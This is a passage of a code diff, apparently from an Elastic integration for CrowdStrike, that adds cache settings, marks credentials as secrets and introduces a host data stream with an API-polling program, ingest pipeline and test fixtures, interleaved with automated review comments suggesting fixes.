@@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: aidmaster + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.aid @@ -89,8 +91,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: userinfo + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.UserSid_readable diff --git a/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs b/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs index 6a03a208a20..dbe321a4d42 100644 
--- a/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs +++ b/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs @@ -34,8 +34,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: aidmaster + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.aid @@ -54,8 +56,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: userinfo + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.UserSid_readable diff --git a/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml index 867d28cc27b..eb3998f8d0f 100644 --- a/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml +++ b/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml @@ -2327,8 +2327,8 @@ processors: ctx.file.extension = ctx.file.name.substring(extIdx+1); } } - if (path.charAt(1) == ":") { - ctx.file.drive_letter = path.charAt(0).toUpperCase(); + if (path.indexOf(':') == 1) { + ctx.file.drive_letter = path.substring(0, 1).toUpperCase(); } - rename: field: _temp.hashes diff --git a/packages/crowdstrike/data_stream/fdr/fields/ecs.yml b/packages/crowdstrike/data_stream/fdr/fields/ecs.yml index 7b4faf503d4..4c5f6667933 100644 --- a/packages/crowdstrike/data_stream/fdr/fields/ecs.yml +++ b/packages/crowdstrike/data_stream/fdr/fields/ecs.yml @@ -58,6 +58,8 @@ name: file.device - external: ecs name: file.directory +- external: ecs + name: file.drive_letter - external: ecs name: file.extension - external: ecs @@ -80,8 +82,12 @@ name: host.geo.country_name - external: ecs name: host.geo.timezone +- external: ecs + name: host.domain - external: ecs name: host.hostname +- external: ecs + name: host.ip - external: ecs name: host.name - external: ecs 
diff --git a/packages/crowdstrike/data_stream/fdr/manifest.yml b/packages/crowdstrike/data_stream/fdr/manifest.yml index 7bce014910b..e57277d8dca 100644 --- a/packages/crowdstrike/data_stream/fdr/manifest.yml +++ b/packages/crowdstrike/data_stream/fdr/manifest.yml @@ -5,6 +5,7 @@ streams: template_path: aws-s3.yml.hbs title: Falcon Data Replicator logs description: Collect Falcon Data Replicator logs using s3 input + enabled: false vars: - name: access_key_id type: text @@ -12,18 +13,21 @@ streams: multi: false required: false show_user: true + secret: false - name: secret_access_key - type: text + type: password title: Secret Access Key multi: false required: false show_user: true + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true + secret: true - name: queue_url type: text title: Queue URL 
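Review bot: Switching `secret_access_key` and `session_token` to `type: password` with `secret: true` is the right call, but Fleet only honours `secret: true` when the package's `format_version` and `conditions.kibana.version` (in the package manifest, outside this diff) permit secret storage — as far as I recall Kibana 8.12 or later; on an older stack the value is still kept in plain text in the agent policy, so confirm that constraint is raised in the same release. Existing policies that already hold these values in the clear presumably keep them until the integration is re-saved, which is worth a line in the changelog so users re-enter the credentials. The explicit `secret: false` on `access_key_id` is fine, since that is an identifier rather than a credential.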
@@ -64,6 +68,22 @@ streams: type: text multi: false default: 168h + - name: metadata_cache_capacity + required: true + show_user: false + title: Metadata cache capacity + description: "The maximum amount of metadata objects to cache. Operations that would cause the capacity to be exceeded will result in evictions of the oldest elements. The capacity should not be lower than the number of elements that are expected to be referenced when processing the input as evicted elements are lost. Values at or below zero indicate no limit. \nWARNING: This setting needs to be set only if the amount of metadata elements is known beforehand, otherwise it might lead to enrichment data loss. If you are not sure, leave it untouched.\n" + type: text + multi: false + default: 0 + - name: metadata_cache_write_interval + required: true + show_user: false + title: Metadata cache write interval + description: The interval between periodic cache writes to the backing file. Valid time units are h, m, s, ms, us/µs and ns. The contents are always written out to the backing file when the processor is closed. Default is zero, no periodic writes. + type: text + multi: false + default: 0 - name: preserve_original_event required: true show_user: true @@ -208,6 +228,7 @@ streams: - input: logfile title: Falcon Data Replicator logs description: Collect Falcon Data Replicator logs using a log file + enabled: false vars: - name: paths type: text diff --git a/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-common-config.yml b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,4 @@ +fields: + tags: + - preserve_original_event + - preserve_duplicate_custom_fields 
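Review bot: `metadata_cache_capacity` is declared `type: text` although its description and default `0` are numeric; declaring it `type: integer` lets Fleet reject non-numeric input instead of rendering an arbitrary string into `backend.capacity` in stream.yml.hbs. For `metadata_cache_write_interval` the default `0` is rendered unquoted while the description lists duration units; a unit-bearing default such as `default: 0s` avoids depending on how the cache processor's config loader coerces a bare integer into a duration, which I have not verified. The same two vars are consumed unconditionally by both `cache` processors in stream.yml.hbs, so the type tightening protects both places at once.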
diff --git a/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log new file mode 100644 index 00000000000..6c33d8dc435 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log 
@@ -0,0 +1 @@ +{"agent_load_flags":"0","agent_local_time":"2023-11-07T04:51:16.678Z","agent_version":"7.05.17603.0","bios_manufacturer":"ABCInc.","bios_version":"2020.0.1.0.0(iBridge:22.11.000.0.0,0)","chassis_type":"9","chassis_type_desc":"Laptop","cid":"92012896127c4948236ba7601b886b0","config_id_base":"6594763","config_id_build":"1703","config_id_platform":"4","connection_ip":"81.2.69.192","cpu_signature":"460517","device_id":"3114433dbce478ca48d9a828b9b34be","device_policies":{"device_control":{"applied":true,"applied_date":"2023-06-20T08:45:26.341093915Z","assigned_date":"2023-06-20T08:43:47.736146738Z","policy_id":"2f88daf0177f467dae69262a5ce71775","policy_type":"device-control"},"firewall":{"applied":true,"applied_date":"2023-09-11T10:33:44.174488832Z","assigned_date":"2023-09-11T10:32:47.853976945Z","policy_id":"1ee301f7e3e24e96ad6a23c73aaac1e3","policy_type":"firewall","rule_set_id":"1ee301f7e3e24e96ad6a23c73aaac1e3"},"global_config":{"applied":true,"applied_date":"2023-11-07T04:52:59.515775409Z","assigned_date":"2023-11-07T04:51:18.94671252Z","policy_id":"7e3078b60976486cac5dc998808d9135","policy_type":"globalconfig","settings_hash":"f01def74"},"prevention":{"applied":true,"applied_date":"2023-06-08T10:04:47.643357971Z","assigned_date":"2023-06-08T10:03:49.505180252Z","policy_id":"1024fac1b279424fa7300b8ac2d56be5","policy_type":"prevention","rule_groups":[],"settings_hash":"f7a54ca1"},"remote_response":{"applied":true,"applied_date":"2023-06-08T10:04:47.01735027Z","assigned_date":"2023-06-08T10:03:49.505163572Z","policy_id":"dabb4def99034f11b9b3d52271584c9f","policy_type":"remote-response","settings_hash":"8a548e5e"},"sensor_update":{"applied":true,"applied_date":"2023-11-07T04:52:59.659583066Z","assigned_date":"2023-11-07T04:47:43.342175341Z","policy_id":"64bfa2bbcd4e46da92a66b107933da11","policy_type":"sensor-update","settings_hash":"tagged|18;101","uninstall_protection":"ENABLED"}},"external_ip":"81.2.69.192","first_seen":"2023-06-08T10:00:19Z","group_h
ash":"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77","groups":["182388a8dbea4c44b5e019cfd32c2695"],"hostname":"CLM101-131.local","kernel_version":"22.6.0","last_seen":"2023-11-07T10:25:24Z","local_ip":"81.2.69.142","mac_address":"14-7d-da-ad-ac-71","machine_domain":"SYS","major_version":"22","meta":{"version":"6002","version_string":"7:43570272778"},"minor_version":"6","modified_timestamp":"2023-11-07T10:26:53Z","os_build":"22G120","os_version":"Ventura(13)","platform_id":"1","platform_name":"Mac","policies":[{"applied":true,"applied_date":"2023-06-08T10:04:47.643357971Z","assigned_date":"2023-06-08T10:03:49.505180252Z","policy_id":"1024fac1b279424fa7300b8ac2d56be5","policy_type":"prevention","rule_groups":[],"settings_hash":"f7a54ca1"}],"product_type_desc":"Workstation","provision_status":"Provisioned","reduced_functionality_mode":"no","serial_number":"FVFDH73HMNHX","site_name":"Default-First-Site-Name","status":"normal","system_manufacturer":"ABCInc.","system_product_name":"Air,1","tags":["tags"]} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log-expected.json b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log-expected.json new file mode 100644 index 00000000000..a6056a521f5 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log-expected.json 
@@ -0,0 +1,207 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-07T10:26:53.000Z", + "crowdstrike": { + "host": { + "agent": { + "load_flags": "0", + "local_time": "2023-11-07T04:51:16.678Z", + "version": "7.05.17603.0" + }, + "bios": { + "manufacturer": "ABCInc.", + "version": "2020.0.1.0.0(iBridge:22.11.000.0.0,0)" + }, + "chassis_type": { + "desc": "Laptop", + "value": "9" + }, + "cid": "92012896127c4948236ba7601b886b0", + "config_id": { + "base": "6594763", + "build": "1703", + "platform": "4" + }, + "connection_ip": "81.2.69.192", + "cpu_signature": "460517", + "device_policies": { + "device_control": { + "applied": true, + "applied_date": "2023-06-20T08:45:26.341Z", + "assigned_date": "2023-06-20T08:43:47.736Z", + "policy_id": "2f88daf0177f467dae69262a5ce71775", + "policy_type": "device-control" + }, + "firewall": { + "applied": true, + "applied_date": "2023-09-11T10:33:44.174Z", + "assigned_date": "2023-09-11T10:32:47.853Z", + "policy": { + "id": "1ee301f7e3e24e96ad6a23c73aaac1e3", + "type": "firewall" + }, + "rule_set_id": "1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.515Z", + "assigned_date": "2023-11-07T04:51:18.946Z", + "policy": { + "id": "7e3078b60976486cac5dc998808d9135", + "type": "globalconfig" + }, + "settings_hash": "f01def74" + }, + "prevention": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + }, + "remote_response": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.017Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "dabb4def99034f11b9b3d52271584c9f", + "type": "remote-response" + }, + "settings_hash": "8a548e5e" + }, + "sensor_update": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.659Z", + "assigned_date": "2023-11-07T04:47:43.342Z", + 
"policy": { + "id": "64bfa2bbcd4e46da92a66b107933da11", + "type": "sensor-update" + }, + "settings_hash": "tagged|18;101", + "uninstall_protection": "ENABLED" + } + }, + "external_ip": "81.2.69.192", + "first_seen": "2023-06-08T10:00:19.000Z", + "group_hash": "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups": [ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname": "CLM101-131.local", + "id": "3114433dbce478ca48d9a828b9b34be", + "kernel_version": "22.6.0", + "last_seen": "2023-11-07T10:25:24.000Z", + "local_ip": "81.2.69.142", + "mac_address": "14-7D-DA-AD-AC-71", + "machine_domain": "SYS", + "major_version": "22", + "meta": { + "version": "6002", + "version_string": "7:43570272778" + }, + "minor_version": "6", + "modified_timestamp": "2023-11-07T10:26:53.000Z", + "os": { + "build": "22G120", + "version": "Ventura(13)" + }, + "platform": { + "id": "1", + "name": "Mac" + }, + "policies": [ + { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + } + ], + "product_type_desc": "Workstation", + "provision_status": "Provisioned", + "reduced_functionality_mode": "no", + "serial_number": "FVFDH73HMNHX", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system": { + "manufacturer": "ABCInc.", + "product_name": "Air,1" + }, + "tags": [ + "tags" + ] + } + }, + "device": { + "id": "3114433dbce478ca48d9a828b9b34be" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "host" + ], + "kind": "event", + "original": 
"{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-11-07T04:51:16.678Z\",\"agent_version\":\"7.05.17603.0\",\"bios_manufacturer\":\"ABCInc.\",\"bios_version\":\"2020.0.1.0.0(iBridge:22.11.000.0.0,0)\",\"chassis_type\":\"9\",\"chassis_type_desc\":\"Laptop\",\"cid\":\"92012896127c4948236ba7601b886b0\",\"config_id_base\":\"6594763\",\"config_id_build\":\"1703\",\"config_id_platform\":\"4\",\"connection_ip\":\"81.2.69.192\",\"cpu_signature\":\"460517\",\"device_id\":\"3114433dbce478ca48d9a828b9b34be\",\"device_policies\":{\"device_control\":{\"applied\":true,\"applied_date\":\"2023-06-20T08:45:26.341093915Z\",\"assigned_date\":\"2023-06-20T08:43:47.736146738Z\",\"policy_id\":\"2f88daf0177f467dae69262a5ce71775\",\"policy_type\":\"device-control\"},\"firewall\":{\"applied\":true,\"applied_date\":\"2023-09-11T10:33:44.174488832Z\",\"assigned_date\":\"2023-09-11T10:32:47.853976945Z\",\"policy_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\",\"policy_type\":\"firewall\",\"rule_set_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\"},\"global_config\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.515775409Z\",\"assigned_date\":\"2023-11-07T04:51:18.94671252Z\",\"policy_id\":\"7e3078b60976486cac5dc998808d9135\",\"policy_type\":\"globalconfig\",\"settings_hash\":\"f01def74\"},\"prevention\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"},\"remote_response\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.01735027Z\",\"assigned_date\":\"2023-06-08T10:03:49.505163572Z\",\"policy_id\":\"dabb4def99034f11b9b3d52271584c9f\",\"policy_type\":\"remote-response\",\"settings_hash\":\"8a548e5e\"},\"sensor_update\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.659583066Z\",\"assigned_date\":\"2023-11-07T04:47:43.342175341Z\",\"policy_id\":\"64bfa2bbcd4e46da92a66b1079
33da11\",\"policy_type\":\"sensor-update\",\"settings_hash\":\"tagged|18;101\",\"uninstall_protection\":\"ENABLED\"}},\"external_ip\":\"81.2.69.192\",\"first_seen\":\"2023-06-08T10:00:19Z\",\"group_hash\":\"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77\",\"groups\":[\"182388a8dbea4c44b5e019cfd32c2695\"],\"hostname\":\"CLM101-131.local\",\"kernel_version\":\"22.6.0\",\"last_seen\":\"2023-11-07T10:25:24Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"14-7d-da-ad-ac-71\",\"machine_domain\":\"SYS\",\"major_version\":\"22\",\"meta\":{\"version\":\"6002\",\"version_string\":\"7:43570272778\"},\"minor_version\":\"6\",\"modified_timestamp\":\"2023-11-07T10:26:53Z\",\"os_build\":\"22G120\",\"os_version\":\"Ventura(13)\",\"platform_id\":\"1\",\"platform_name\":\"Mac\",\"policies\":[{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"}],\"product_type_desc\":\"Workstation\",\"provision_status\":\"Provisioned\",\"reduced_functionality_mode\":\"no\",\"serial_number\":\"FVFDH73HMNHX\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"ABCInc.\",\"system_product_name\":\"Air,1\",\"tags\":[\"tags\"]}", + "type": [ + "info" + ] + }, + "host": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "hostname": "CLM101-131.local", + "ip": [ + "81.2.69.192" + ], + "mac": [ + "14-7D-DA-AD-AC-71" + ], + "os": { + "full": "Ventura(13)", + "platform": "Mac" + } + }, + "related": { + "hash": [ + "f01def74", + "f7a54ca1", + "8a548e5e", + "tagged|18;101", + "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77" + ], + "hosts": [ 
+ "CLM101-131.local", + "SYS" + ], + "ip": [ + "81.2.69.192", + "81.2.69.142" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + } + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/host/_dev/test/system/test-common-config.yml b/packages/crowdstrike/data_stream/host/_dev/test/system/test-common-config.yml new file mode 100644 index 00000000000..ce31a5541cf --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/system/test-common-config.yml @@ -0,0 +1,15 @@ +input: cel +service: crowdstrike-host +vars: + url: http://{{Hostname}}:{{Port}} + client_id: xxxx + client_secret: xxxx + token_url: http://{{Hostname}}:{{Port}}/oauth2/token +data_stream: + vars: + interval: 10s + batch_size: 1 + preserve_original_event: true + preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/crowdstrike/data_stream/host/agent/stream/cel.yml.hbs b/packages/crowdstrike/data_stream/host/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..c9f18bb66ce --- /dev/null +++ b/packages/crowdstrike/data_stream/host/agent/stream/cel.yml.hbs 
@@ -0,0 +1,103 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +auth.oauth2: + client.id: {{client_id}} + client.secret: {{client_secret}} + token_url: {{token_url}} +state: + initial_interval: {{initial_interval}} + want_more: false + offset: 0 + batch_size: {{batch_size}} +redact: + fields: ~ +program: | + ( + state.with( + ( + !state.want_more ? + request("GET", state.url + "/devices/queries/devices/v1?sort=modified_timestamp.asc&offset=0&limit=" + string(state.batch_size) + '&filter=modified_timestamp:>"' + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + state.cursor.last_timestamp + '"' + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + '"' + )) + : + request("GET", state.url + "/devices/queries/devices/v1?sort=modified_timestamp.asc&offset=" + string(state.offset) + "&limit=" + string(state.batch_size) + '&filter=modified_timestamp:>"' + ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + '"' + : + '"' + )) + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "resources": has(body.resources) && body.resources.size() > 0 ? body.resources : "", + "want_more": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total), + "offset": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? 
+ int(state.offset) + int(body.resources.size()) + : + 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + })) + ).as(state, state.with( + !has(state.resources) || state.resources == "" ? {"events": []} : + post_request( + state.url + "/devices/entities/devices/v2", + "application/json", + {"ids": state.resources }.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(inner_body, { + "events": inner_body.resources.map(e, { + "message": e.encode_json(), + }), + "cursor": { + "last_timestamp": ( + has(inner_body.resources) && inner_body.resources.size() > 0 ? + inner_body.resources.map(e, e.modified_timestamp).max() + : has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + ( state.want_more ? state.cursor.first_timestamp : state.cursor.last_timestamp ) + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + ), + }, + })) + ) + ) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/crowdstrike/data_stream/host/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/host/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..37c0a4ffe8c --- /dev/null +++ b/packages/crowdstrike/data_stream/host/elasticsearch/ingest_pipeline/default.yml 
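Review bot: Neither `do_request()` result is checked for `resp.StatusCode` before `bytes(resp.Body).decode_json()`: an OAuth failure, a 403 or a 429 from `/devices/queries/devices/v1` returns an error document without `resources` or `meta`, so `body.resources.size()` in the `want_more` expression (which, unlike the `resources` entry next to it, has no `has(body.resources)` guard) and `body.meta.pagination.total` raise a CEL evaluation error and the failure is only visible in the input log rather than as an error event. Guarding the first request as below, passing `state.events` through when it is already set, and applying the same check to the `/devices/entities/devices/v2` POST keeps the failure visible in the event stream and stops paging state from being advanced on an error body.
```yaml
program: |
  (
    state.with(
      (
        // … unchanged: GET request construction …
      ).do_request().as(resp, resp.StatusCode == 200 ?
        bytes(resp.Body).decode_json().as(body, {
          "resources": has(body.resources) && body.resources.size() > 0 ? body.resources : "",
          "want_more": has(body.resources) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total),
          // … unchanged: offset, url, batch_size, initial_interval …
        })
      :
        {
          "events": [{
            "error": {
              "code": string(resp.StatusCode),
              "id": string(resp.Status),
              "message": "GET " + state.url + ": " + string(resp.StatusCode) + " " + string(resp.Status) + " (" + string(resp.Body) + ")",
            },
          }],
          "want_more": false,
          "offset": 0,
          "url": state.url,
          "batch_size": state.batch_size,
          "initial_interval": state.initial_interval,
        }
      )
    ).as(state, has(state.events) ? state : state.with(
      // … unchanged: POST to /devices/entities/devices/v2 and cursor update …
    ))
  )
```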
@@ -0,0 +1,816 @@ +--- +description: Pipeline for processing Host logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind + value: event + - append: + field: event.category + tag: append_host_into_event_category + value: host + allow_duplicates: false + - append: + field: event.type + tag: append_info_into_event_type + value: info + allow_duplicates: false + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.agent_load_flags + tag: rename_agent_load_flags + target_field: crowdstrike.host.agent.load_flags + ignore_missing: true + - date: + field: json.agent_local_time + tag: date_agent_local_time + target_field: crowdstrike.host.agent.local_time + formats: + - ISO8601 + if: ctx.json?.agent_local_time != null && ctx.json.agent_local_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.agent_version + tag: rename_agent_version + target_field: crowdstrike.host.agent.version + ignore_missing: true + - rename: + field: json.bios_manufacturer + tag: rename_bios_manufacturer + target_field: crowdstrike.host.bios.manufacturer + ignore_missing: true + - rename: + field: json.bios_version + tag: rename_bios_version + target_field: crowdstrike.host.bios.version + ignore_missing: true + - rename: + 
field: json.chassis_type_desc + tag: rename_chassis_type_desc + target_field: crowdstrike.host.chassis_type.desc + ignore_missing: true + - rename: + field: json.chassis_type + tag: rename_chassis_type + target_field: crowdstrike.host.chassis_type.value + ignore_missing: true + - rename: + field: json.cid + tag: rename_cid + target_field: crowdstrike.host.cid + ignore_missing: true + - rename: + field: json.config_id_base + tag: rename_config_id_base + target_field: crowdstrike.host.config_id.base + ignore_missing: true + - rename: + field: json.config_id_build + tag: rename_config_id_build + target_field: crowdstrike.host.config_id.build + ignore_missing: true + - rename: + field: json.config_id_platform + tag: rename_config_id_platform + target_field: crowdstrike.host.config_id.platform + ignore_missing: true + - convert: + field: json.connection_ip + tag: convert_connection_ip_to_ip + target_field: crowdstrike.host.connection_ip + type: ip + ignore_missing: true + if: ctx.json?.connection_ip != null && ctx.json.connection_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_connection_ip_into_related_ip + value: '{{{crowdstrike.host.connection_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.connection_ip != null + - rename: + field: json.cpu_signature + tag: rename_cpu_signature + target_field: crowdstrike.host.cpu_signature + ignore_missing: true + - convert: + field: json.device_policies.device_control.applied + tag: convert_device_policies_device_control_applied_to_boolean + target_field: crowdstrike.host.device_policies.device_control.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} 
with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.device_control.applied_date + tag: date_device_policies_device_control_applied_date + target_field: crowdstrike.host.device_policies.device_control.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.device_control?.applied_date != null && ctx.json.device_policies.device_control.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.device_control.assigned_date + tag: date_device_policies_device_control_assigned_date + target_field: crowdstrike.host.device_policies.device_control.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.device_control?.assigned_date != null && ctx.json.device_policies.device_control.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.device_control.policy_id + tag: rename_device_policies_device_control_policy_id + target_field: crowdstrike.host.device_policies.device_control.policy_id + ignore_missing: true + - rename: + field: json.device_policies.device_control.policy_type + tag: rename_device_policies_device_control_policy_type + target_field: crowdstrike.host.device_policies.device_control.policy_type + ignore_missing: true + - convert: + field: json.device_policies.firewall.applied + tag: convert_device_policies_firewall_applied_to_boolean + target_field: 
crowdstrike.host.device_policies.firewall.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.firewall.applied_date + tag: date_device_policies_firewall_applied_date + target_field: crowdstrike.host.device_policies.firewall.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.firewall?.applied_date != null && ctx.json.device_policies.firewall.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.firewall.assigned_date + tag: date_device_policies_firewall_assigned_date + target_field: crowdstrike.host.device_policies.firewall.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.firewall?.assigned_date != null && ctx.json.device_policies.firewall.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.firewall.policy_id + tag: rename_device_policies_firewall_policy_id + target_field: crowdstrike.host.device_policies.firewall.policy.id + ignore_missing: true + - rename: + field: json.device_policies.firewall.policy_type + tag: rename_device_policies_firewall_policy_type + target_field: crowdstrike.host.device_policies.firewall.policy.type + ignore_missing: true + - rename: + field: json.device_policies.firewall.rule_set_id + tag: 
